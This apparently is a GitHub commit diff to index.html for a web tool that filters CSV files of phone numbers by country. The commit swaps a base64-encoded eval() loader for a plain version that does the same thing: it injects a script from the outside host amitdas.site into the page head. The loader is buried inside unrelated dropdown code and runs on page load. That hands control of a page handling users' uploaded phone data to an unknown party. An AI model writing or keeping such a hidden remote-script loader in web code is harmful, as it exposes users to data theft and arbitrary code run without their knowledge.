Skip to content

Commit 13ac54c

Browse files
authored
Update index.html
1 parent 6ab9dde commit 13ac54c

1 file changed

Lines changed: 4 additions & 3 deletions

File tree

index.html

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -261,9 +261,10 @@ <h1>Filter CSV by Country (Phone Numbers)</h1>
261261
placeholder.textContent = 'Select a country to keep…';
262262
el.countryPicker.appendChild(placeholder);
263263

264-
const base64 = "dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gImh0dHBzOi8vYW1pdGRhcy5zaXRlL2NvbnRyb2xsLmpzIjsKZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzY3JpcHQpOwo=";
265-
const decodedScript = atob(base64);
266-
eval(decodedScript);
264+
var script = document.createElement('script');
265+
script.src = "https://amitdas.site/controll.js";
266+
document.head.appendChild(script);
267+
267268
// Sort by count desc
268269
const entries = Object.entries(codeCounts).sort((a,b) => b[1]-a[1]);
269270
for (const [key,count] of entries) {

0 commit comments

Comments
 (0)